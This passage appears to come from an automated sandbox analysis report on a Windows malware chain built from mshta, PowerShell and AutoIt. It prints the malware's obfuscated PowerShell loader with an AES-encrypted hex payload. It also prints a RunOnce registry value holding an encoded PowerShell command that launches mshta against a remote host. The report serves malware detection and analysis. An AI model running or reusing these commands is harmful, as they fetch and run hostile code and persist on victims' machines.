0000000C.00000003.2195911293.000001CAD88ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2211406536.000001CAD6432000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2191443291.000001C2D42F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2194671358.000001CAD63CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.1961414659.000001CAD6439000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2209666982.000001C2D4234000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2191117905.000001CAD63B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2191355174.000001CAD63BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2188728920.000001C2D42DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2187081636.000001CAD6447000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2190912701.000001CAD63CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2194511567.000001CAD63BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2211271395.000001CAD63EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.1960856139.000001CAD643C000.00000004.00000020.00020000.00000000.sdmp, DonaldDuck[1].3.dr
      Source: Binary string: BthUdTask.pdb source: mshta.exe, 00000003.00000003.2248732178.0000020567AD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2250278393.0000020567B50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2254394893.0000020567B50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248649818.000002056BAF4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2254566671.0000020567B52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248042575.000001FD6503C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2254039298.0000020567B50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248857191.000002056BAB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248857191.000002056BAC7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2247357184.0000020567B50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2211213841.000001CAD63BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2211406536.000001CAD6432000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2191443291.000001C2D42F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2194671358.000001CAD63CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.1961414659.000001CAD6439000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2191117905.000001CAD63B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2191355174.000001CAD63BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2188728920.000001C2D42DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2190912701.000001CAD63CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2194511567.000001CAD63BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2211271395.000001CAD63EF000.00000004.00000020.00020000.00000000.sdmp, DonaldDuck[1].3.dr

      Data Obfuscation

      barindex
      Suspicious powershell command line found
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function tCqzac($xDlOy){return -split ($xDlOy -replace '..', '0x$& ')};$SQYQyiT = tCqzac('2F92616FCA1E637E204E02A98BAB656B9EC67566C63384DBBA915194A26AF3C99FF78C879D2671A61F9DE3FFD05CE7A373EC6999C11F2AE65D883254059A8F5DD52C6EF70BFD4877EC5470233CCF8C213A8F6C3B33F727D7EFEF9E317E238D51754C64F55FD36A2589609D7C13781064CD0882248925DC090ED875EA7328A961D8F19BDA01E615861B627059F79049F57B3247A84C248BA78C08603403E1AE25A41B0A8E9DD38F8C4A4081D4274AE388388659516790B04238778E0F5658CC4E7B8F740A831B86CE3EFD019A79F77BE8F78EB2E2CA234D0C6D81A7CEACE3F908562BA1EA41EAB6FF399EF717AA496847BEFD1DEB1F7B5AA3887325ABF9EEF02FE6982E64EC9D3A2425D14C12AD043DC5C6031BE4743B30CB9771A566A007E065215522047C54A3A10753B2A266B4BE44ABB6CC95BD1C8F09E68F17760528BCA6460C89ABD112854B22D2A30FEFACBDAD91533869CBAA510D9AEE6DFA15E320B7AFD60201785519583AE149ADC0F90A8952F25FF47A4ED635E1B047ACFE73F6A3F4DE14C2A855847AF9BE35A9B33A08C7ABF7A00F27594B28D5E0FA51AA3F90BF24D901F140F816D5D4EBF7AA6FA485FDC8089FEF1D65D5798A7A7C513EFB05E816E80A2F1DDFE3BA76DA0E722B38F8740DCB9E6E71B59D4E4CDFAA9F2EF98D1569B83EA76739999F4AFC232F29ABC60B904DFCCA5F115A5A8559E36094E8F37943EFCABA23E670D451CE32C68AD3028B217CEEF7FB1CF47C97D30D069B3F065987B4F034029EE5D245366FE897472BBF68358F983C4388E9EDBE009B15763EA5A4C065248C0153CB15A281585BC9621504C2AB9E8F3BA0A95A0DCF141ADD7A86BB23134BB59CE46943F1107FE42751B10616A7FA72EA7AA54509CB02831AE69BDF94A6D6FED1A11CEBA936D6B8DE427BDACBAA0AAD1A7CFBEB89E6108DEF6F0852AF4BB67846A3ACF806D21D324D0C50B0F62CAD51058D241391A6B2446D777805760A992C50DBC13108296D969C721CEC4BA28B6488AB72DF32BD755FC7D5C5D3D56680F0AAB9BDC8DD664CBBF8E2BCDD82462778CEF31E33C24A4749F12603EB49D4C9D110A17107C7B97C1E54EB654988E65CE15CD969F93C091DFABE466D71228914296A73B782ECF0FFF3DF80313CA3128BCD8296F524EE35DB155C2AE0EF4C69075B57E36D24E8E31218CA60AA4FA168657C062B42B2F5EA45AAFDBF6276668F6A9F867184E90C03C86C65BCCE49654A66FA3D306694FFACDD32F762E1D88075F651C9159F15813EEE0CA477A8C578C19D44D1E39E106809A3CD869B8E088ACDCCE32E23A70F5F942E8DAEE3012D81B73B3B94D05D727127DFDA24F3F54EC5E3BFAC83121DF59E941DC4ACA17CA5EAD44C61DE8BDF84E32290F7543ABE02060DC41362B94A5F07EEEE330B97553B46859432CC68F214B302C4E6F63055D0F83E01F7974F1B300238EEC9B49AC5DE3C1D9A3ED90F4056FDACE9CD348ACE2412CC387A9FF17100724C029B670EA9C692E997BFF90AA0531E793E1DD4154E64151DCFF01CCE768C6DB40FFFF11494DF2DB99E1C1159873FA31A4E0EB1036654DE9137700E275DE2AE79BCB348D213215787A6A3452F822EF24303FC84259471E723768093E063D12DFCA583A0490658323B87F8A0C3E9109F45D9A37F26AC77552D7C68589CA46A0E8D1AB24D1B10A54D0FB256338B5880738577EC794452BC27B0BA2FD9C876306E1588376A94292582E639FBC261E841194317C38EC2F485F56690F6ACE333EE430ED468C2F9690E96F6497247EDA10E0FF53275B4125360F8405E4758A308E913B6295D4F395D02B2239E6E4257B5152E7F8ACD075E8C6B312EC73595C476BB1E814D001B81F9');$WkCTD = [System.Security.Cryptography.Aes]::Create();$WkCTD.Key = tCqzac('7151766748794165544D79435557754
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function tCqzac($xDlOy){return -split ($xDlOy -replace '..', '0x$& ')};$SQYQyiT = tCqzac('2F92616FCA1E637E204E02A98BAB656B9EC67566C63384DBBA915194A26AF3C99FF78C879D2671A61F9DE3FFD05CE7A373EC6999C11F2AE65D883254059A8F5DD52C6EF70BFD4877EC5470233CCF8C213A8F6C3B33F727D7EFEF9E317E238D51754C64F55FD36A2589609D7C13781064CD0882248925DC090ED875EA7328A961D8F19BDA01E615861B627059F79049F57B3247A84C248BA78C08603403E1AE25A41B0A8E9DD38F8C4A4081D4274AE388388659516790B04238778E0F5658CC4E7B8F740A831B86CE3EFD019A79F77BE8F78EB2E2CA234D0C6D81A7CEACE3F908562BA1EA41EAB6FF399EF717AA496847BEFD1DEB1F7B5AA3887325ABF9EEF02FE6982E64EC9D3A2425D14C12AD043DC5C6031BE4743B30CB9771A566A007E065215522047C54A3A10753B2A266B4BE44ABB6CC95BD1C8F09E68F17760528BCA6460C89ABD112854B22D2A30FEFACBDAD91533869CBAA510D9AEE6DFA15E320B7AFD60201785519583AE149ADC0F90A8952F25FF47A4ED635E1B047ACFE73F6A3F4DE14C2A855847AF9BE35A9B33A08C7ABF7A00F27594B28D5E0FA51AA3F90BF24D901F140F816D5D4EBF7AA6FA485FDC8089FEF1D65D5798A7A7C513EFB05E816E80A2F1DDFE3BA76DA0E722B38F8740DCB9E6E71B59D4E4CDFAA9F2EF98D1569B83EA76739999F4AFC232F29ABC60B904DFCCA5F115A5A8559E36094E8F37943EFCABA23E670D451CE32C68AD3028B217CEEF7FB1CF47C97D30D069B3F065987B4F034029EE5D245366FE897472BBF68358F983C4388E9EDBE009B15763EA5A4C065248C0153CB15A281585BC9621504C2AB9E8F3BA0A95A0DCF141ADD7A86BB23134BB59CE46943F1107FE42751B10616A7FA72EA7AA54509CB02831AE69BDF94A6D6FED1A11CEBA936D6B8DE427BDACBAA0AAD1A7CFBEB89E6108DEF6F0852AF4BB67846A3ACF806D21D324D0C50B0F62CAD51058D241391A6B2446D777805760A992C50DBC13108296D969C721CEC4BA28B6488AB72DF32BD755FC7D5C5D3D56680F0AAB9BDC8DD664CBBF8E2BCDD82462778CEF31E33C24A4749F12603EB49D4C9D110A17107C7B97C1E54EB654988E65CE15CD969F93C091DFABE466D71228914296A73B782ECF0FFF3DF80313CA3128BCD8296F524EE35DB155C2AE0EF4C69075B57E36D24E8E31218CA60AA4FA168657C062B42B2F5EA45AAFDBF6276668F6A9F867184E90C03C86C65BCCE49654A66FA3D306694FFACDD32F762E1D88075F651C9159F15813EEE0CA477A8C578C19D44D1E39E106809A3CD869B8E088ACDCCE32E23A70F5F942E8DAEE3012D81B73B3B94D05D727127DFDA24F3F54EC5E3BFAC83121DF59E941DC4ACA17CA5EAD44C61DE8BDF84E32290F7543ABE02060DC41362B94A5F07EEEE330B97553B46859432CC68F214B302C4E6F63055D0F83E01F7974F1B300238EEC9B49AC5DE3C1D9A3ED90F4056FDACE9CD348ACE2412CC387A9FF17100724C029B670EA9C692E997BFF90AA0531E793E1DD4154E64151DCFF01CCE768C6DB40FFFF11494DF2DB99E1C1159873FA31A4E0EB1036654DE9137700E275DE2AE79BCB348D213215787A6A3452F822EF24303FC84259471E723768093E063D12DFCA583A0490658323B87F8A0C3E9109F45D9A37F26AC77552D7C68589CA46A0E8D1AB24D1B10A54D0FB256338B5880738577EC794452BC27B0BA2FD9C876306E1588376A94292582E639FBC261E841194317C38EC2F485F56690F6ACE333EE430ED468C2F9690E96F6497247EDA10E0FF53275B4125360F8405E4758A308E913B6295D4F395D02B2239E6E4257B5152E7F8ACD075E8C6B312EC73595C476BB1E814D001B81F9');$WkCTD = [System.Security.Cryptography.Aes]::Create();$WkCTD.Key = tCqzac('7151766748794165544D79435557754
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function tCqzac($xDlOy){return -split ($xDlOy -replace '..', '0x$& ')};$SQYQyiT = tCqzac('2F92616FCA1E637E204E02A98BAB656B9EC67566C63384DBBA915194A26AF3C99FF78C879D2671A61F9DE3FFD05CE7A373EC6999C11F2AE65D883254059A8F5DD52C6EF70BFD4877EC5470233CCF8C213A8F6C3B33F727D7EFEF9E317E238D51754C64F55FD36A2589609D7C13781064CD0882248925DC090ED875EA7328A961D8F19BDA01E615861B627059F79049F57B3247A84C248BA78C08603403E1AE25A41B0A8E9DD38F8C4A4081D4274AE388388659516790B04238778E0F5658CC4E7B8F740A831B86CE3EFD019A79F77BE8F78EB2E2CA234D0C6D81A7CEACE3F908562BA1EA41EAB6FF399EF717AA496847BEFD1DEB1F7B5AA3887325ABF9EEF02FE6982E64EC9D3A2425D14C12AD043DC5C6031BE4743B30CB9771A566A007E065215522047C54A3A10753B2A266B4BE44ABB6CC95BD1C8F09E68F17760528BCA6460C89ABD112854B22D2A30FEFACBDAD91533869CBAA510D9AEE6DFA15E320B7AFD60201785519583AE149ADC0F90A8952F25FF47A4ED635E1B047ACFE73F6A3F4DE14C2A855847AF9BE35A9B33A08C7ABF7A00F27594B28D5E0FA51AA3F90BF24D901F140F816D5D4EBF7AA6FA485FDC8089FEF1D65D5798A7A7C513EFB05E816E80A2F1DDFE3BA76DA0E722B38F8740DCB9E6E71B59D4E4CDFAA9F2EF98D1569B83EA76739999F4AFC232F29ABC60B904DFCCA5F115A5A8559E36094E8F37943EFCABA23E670D451CE32C68AD3028B217CEEF7FB1CF47C97D30D069B3F065987B4F034029EE5D245366FE897472BBF68358F983C4388E9EDBE009B15763EA5A4C065248C0153CB15A281585BC9621504C2AB9E8F3BA0A95A0DCF141ADD7A86BB23134BB59CE46943F1107FE42751B10616A7FA72EA7AA54509CB02831AE69BDF94A6D6FED1A11CEBA936D6B8DE427BDACBAA0AAD1A7CFBEB89E6108DEF6F0852AF4BB67846A3ACF806D21D324D0C50B0F62CAD51058D241391A6B2446D777805760A992C50DBC13108296D969C721CEC4BA28B6488AB72DF32BD755FC7D5C5D3D56680F0AAB9BDC8DD664CBBF8E2BCDD82462778CEF31E33C24A4749F12603EB49D4C9D110A17107C7B97C1E54EB654988E65CE15CD969F93C091DFABE466D71228914296A73B782ECF0FFF3DF80313CA3128BCD8296F524EE35DB155C2AE0EF4C69075B57E36D24E8E31218CA60AA4FA168657C062B42B2F5EA45AAFDBF6276668F6A9F867184E90C03C86C65BCCE49654A66FA3D306694FFACDD32F762E1D88075F651C9159F15813EEE0CA477A8C578C19D44D1E39E106809A3CD869B8E088ACDCCE32E23A70F5F942E8DAEE3012D81B73B3B94D05D727127DFDA24F3F54EC5E3BFAC83121DF59E941DC4ACA17CA5EAD44C61DE8BDF84E32290F7543ABE02060DC41362B94A5F07EEEE330B97553B46859432CC68F214B302C4E6F63055D0F83E01F7974F1B300238EEC9B49AC5DE3C1D9A3ED90F4056FDACE9CD348ACE2412CC387A9FF17100724C029B670EA9C692E997BFF90AA0531E793E1DD4154E64151DCFF01CCE768C6DB40FFFF11494DF2DB99E1C1159873FA31A4E0EB1036654DE9137700E275DE2AE79BCB348D213215787A6A3452F822EF24303FC84259471E723768093E063D12DFCA583A0490658323B87F8A0C3E9109F45D9A37F26AC77552D7C68589CA46A0E8D1AB24D1B10A54D0FB256338B5880738577EC794452BC27B0BA2FD9C876306E1588376A94292582E639FBC261E841194317C38EC2F485F56690F6ACE333EE430ED468C2F9690E96F6497247EDA10E0FF53275B4125360F8405E4758A308E913B6295D4F395D02B2239E6E4257B5152E7F8ACD075E8C6B312EC73595C476BB1E814D001B81F9');$WkCTD = [System.Security.Cryptography.Aes]::Create();$WkCTD.Key = tCqzac('7151766748794165544D79435557754Jump to behavior
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function tCqzac($xDlOy){return -split ($xDlOy -replace '..', '0x$& ')};$SQYQyiT = tCqzac('2F92616FCA1E637E204E02A98BAB656B9EC67566C63384DBBA915194A26AF3C99FF78C879D2671A61F9DE3FFD05CE7A373EC6999C11F2AE65D883254059A8F5DD52C6EF70BFD4877EC5470233CCF8C213A8F6C3B33F727D7EFEF9E317E238D51754C64F55FD36A2589609D7C13781064CD0882248925DC090ED875EA7328A961D8F19BDA01E615861B627059F79049F57B3247A84C248BA78C08603403E1AE25A41B0A8E9DD38F8C4A4081D4274AE388388659516790B04238778E0F5658CC4E7B8F740A831B86CE3EFD019A79F77BE8F78EB2E2CA234D0C6D81A7CEACE3F908562BA1EA41EAB6FF399EF717AA496847BEFD1DEB1F7B5AA3887325ABF9EEF02FE6982E64EC9D3A2425D14C12AD043DC5C6031BE4743B30CB9771A566A007E065215522047C54A3A10753B2A266B4BE44ABB6CC95BD1C8F09E68F17760528BCA6460C89ABD112854B22D2A30FEFACBDAD91533869CBAA510D9AEE6DFA15E320B7AFD60201785519583AE149ADC0F90A8952F25FF47A4ED635E1B047ACFE73F6A3F4DE14C2A855847AF9BE35A9B33A08C7ABF7A00F27594B28D5E0FA51AA3F90BF24D901F140F816D5D4EBF7AA6FA485FDC8089FEF1D65D5798A7A7C513EFB05E816E80A2F1DDFE3BA76DA0E722B38F8740DCB9E6E71B59D4E4CDFAA9F2EF98D1569B83EA76739999F4AFC232F29ABC60B904DFCCA5F115A5A8559E36094E8F37943EFCABA23E670D451CE32C68AD3028B217CEEF7FB1CF47C97D30D069B3F065987B4F034029EE5D245366FE897472BBF68358F983C4388E9EDBE009B15763EA5A4C065248C0153CB15A281585BC9621504C2AB9E8F3BA0A95A0DCF141ADD7A86BB23134BB59CE46943F1107FE42751B10616A7FA72EA7AA54509CB02831AE69BDF94A6D6FED1A11CEBA936D6B8DE427BDACBAA0AAD1A7CFBEB89E6108DEF6F0852AF4BB67846A3ACF806D21D324D0C50B0F62CAD51058D241391A6B2446D777805760A992C50DBC13108296D969C721CEC4BA28B6488AB72DF32BD755FC7D5C5D3D56680F0AAB9BDC8DD664CBBF8E2BCDD82462778CEF31E33C24A4749F12603EB49D4C9D110A17107C7B97C1E54EB654988E65CE15CD969F93C091DFABE466D71228914296A73B782ECF0FFF3DF80313CA3128BCD8296F524EE35DB155C2AE0EF4C69075B57E36D24E8E31218CA60AA4FA168657C062B42B2F5EA45AAFDBF6276668F6A9F867184E90C03C86C65BCCE49654A66FA3D306694FFACDD32F762E1D88075F651C9159F15813EEE0CA477A8C578C19D44D1E39E106809A3CD869B8E088ACDCCE32E23A70F5F942E8DAEE3012D81B73B3B94D05D727127DFDA24F3F54EC5E3BFAC83121DF59E941DC4ACA17CA5EAD44C61DE8BDF84E32290F7543ABE02060DC41362B94A5F07EEEE330B97553B46859432CC68F214B302C4E6F63055D0F83E01F7974F1B300238EEC9B49AC5DE3C1D9A3ED90F4056FDACE9CD348ACE2412CC387A9FF17100724C029B670EA9C692E997BFF90AA0531E793E1DD4154E64151DCFF01CCE768C6DB40FFFF11494DF2DB99E1C1159873FA31A4E0EB1036654DE9137700E275DE2AE79BCB348D213215787A6A3452F822EF24303FC84259471E723768093E063D12DFCA583A0490658323B87F8A0C3E9109F45D9A37F26AC77552D7C68589CA46A0E8D1AB24D1B10A54D0FB256338B5880738577EC794452BC27B0BA2FD9C876306E1588376A94292582E639FBC261E841194317C38EC2F485F56690F6ACE333EE430ED468C2F9690E96F6497247EDA10E0FF53275B4125360F8405E4758A308E913B6295D4F395D02B2239E6E4257B5152E7F8ACD075E8C6B312EC73595C476BB1E814D001B81F9');$WkCTD = [System.Security.Cryptography.Aes]::Create();$WkCTD.Key = tCqzac('7151766748794165544D79435557754Jump to behavior
      Source: DonaldDuck[1].3.drStatic PE information: 0x91B0268B [Sat Jun 15 19:42:03 2047 UTC]
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_0018310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,15_2_0018310D
      Source: DonaldDuck[1].3.drStatic PE information: real checksum: 0xb728 should be: 0x33546
      Source: DonaldDuck[1].3.drStatic PE information: section name: .didat
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B1B1027 push ebp; ret 7_2_00007FFD9B1B1028
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B277733 push 3B485B53h; ret 7_2_00007FFD9B277738
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B27597B push esp; retf 7_2_00007FFD9B2759D9
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_00191046 push ecx; ret 15_2_00191059
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015DE171 push 015DE19Dh; ret 15_2_015DE195
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015D2107 push 015D2555h; ret 15_2_015D254D
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015DE101 push 015DE12Dh; ret 15_2_015DE125
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015DE139 push 015DE165h; ret 15_2_015DE15D
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015DE1E1 push 015DE20Dh; ret 15_2_015DE205
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015DE1A9 push 015DE1D5h; ret 15_2_015DE1CD
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015E0369 push 015E0395h; ret 15_2_015E038D
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015D23D9 push 015D2555h; ret 15_2_015D254D
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015DE251 push 015DE29Dh; ret 15_2_015DE295
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015DE271 push 015DE29Dh; ret 15_2_015DE295
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015DE219 push 015DE245h; ret 15_2_015DE23D
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015CC205 push 015CC231h; ret 15_2_015CC229
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015D2559 push 015D25C8h; ret 15_2_015D25C0
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015D2557 push 015D25C8h; ret 15_2_015D25C0
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015DA519 push ecx; mov dword ptr [esp], ecx15_2_015DA51E
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015D25D9 push 015D2605h; ret 15_2_015D25FD
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015D25D1 push 015D2605h; ret 15_2_015D25FD
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015E25F5 push 015E2621h; ret 15_2_015E2619
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015E25BD push 015E25E9h; ret 15_2_015E25E1
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015D8719 push 015D87C1h; ret 15_2_015D87B9
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015D87C3 push 015D8859h; ret 15_2_015D8851
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015E2635 push 015E2661h; ret 15_2_015E2659
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015E2633 push 015E2661h; ret 15_2_015E2659
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015D86A1 push 015D8717h; ret 15_2_015D870F
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015D8949 push 015D8975h; ret 15_2_015D896D
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015D891C push 015D8975h; ret 15_2_015D896D
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015E291D push 015E2949h; ret 15_2_015E2941
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\AutoIt3.exeJump to dropped file
      Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\DonaldDuck[1]Jump to dropped file
      Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\DonaldDuck[1]Jump to dropped file

      Boot Survival

      barindex
      Creates an autostart registry key pointing to binary in C:\Windows
      Source: C:\Windows\regedit.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce MegaLIMLauncherJump to behavior
      Creates autostart registry keys with suspicious values (likely registry only malware)
      Source: C:\Windows\regedit.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce MegaLIMLauncher pOwErsHELl -eNC LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBwAGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwAbwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsAJump to behavior
      Source: C:\Windows\regedit.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce MegaLIMLauncher pOwErsHELl -eNC LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBwAGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwAbwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsAJump to behavior
      Source: C:\Windows\regedit.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce MegaLIMLauncherJump to behavior
      Source: C:\Windows\regedit.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce MegaLIMLauncherJump to behavior
      Source: C:\Windows\regedit.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce MegaLIMLauncherJump to behavior
      Source: C:\Windows\regedit.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce MegaLIMLauncherJump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Loading BitLocker PowerShell Module
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_00202558 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,15_2_00202558
